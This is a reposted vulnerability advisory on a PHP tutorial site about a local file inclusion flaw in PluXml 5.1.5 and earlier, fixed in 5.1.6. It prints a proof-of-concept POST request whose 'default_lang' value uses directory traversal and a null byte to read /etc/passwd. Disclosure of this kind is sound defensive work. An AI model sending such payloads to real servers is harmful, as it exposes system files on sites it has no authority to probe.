网站地图    收藏   

主页 > 后端 > 网站安全 >

PluXml 5.1.5本地文件包含缺陷及修复 - 网站安全

来源:自学PHP网    时间:2015-04-17 14:11 作者: 阅读:

[导读] 开发者网站: pluxml.org缺陷影响版本: 5.1.5 及以前已测试版本: 5.1.5补丁时间: 16 April 2012问题类别:本地文件包含修复状态:作者已修正高危日志High-Tech Bridge SA Security Research Lab has ......

开发者网站: pluxml.org
缺陷影响版本: 5.1.5 及以前
已测试版本: 5.1.5
补丁时间: 16 April 2012
问题类别:本地文件包含
修复状态:作者已修正
高危

日志
 
High-Tech Bridge SA Security Research Lab has discovered vulnerabiliy in PluXml, which can be exploited to perform Local File Inclusion attacks.
 
 
1) Local File Inclusion in PluXml
 
1.1 Input passed via the "default_lang" POST parameter to /update/index.php is not properly verified before being used in www.2cto.com include_once() function and can be exploited to include arbitrary local files.
This can be exploited to include local files via directory traversal sequences and URL-encoded NULL bytes.
 
The following PoC (Proof of Concept) demonstrates the vulnerability:
 
 
POST /update/index.php HTTP/1.1
[...]
Content-Type: application/x-www-form-urlencoded
Content-Length: [...]
 
default_lang=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
 
 
-----------------------------------------------------------------------------------------------
 
解决方案:
 
升级到 PluXml 5.1.6
 
More Information:
http://www.pluxml.org/article59/sortie-de-pluxml-5-1-6
http://telechargements.pluxml.org/changelog
 
-----------------------------------------------------------------------------------------------

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论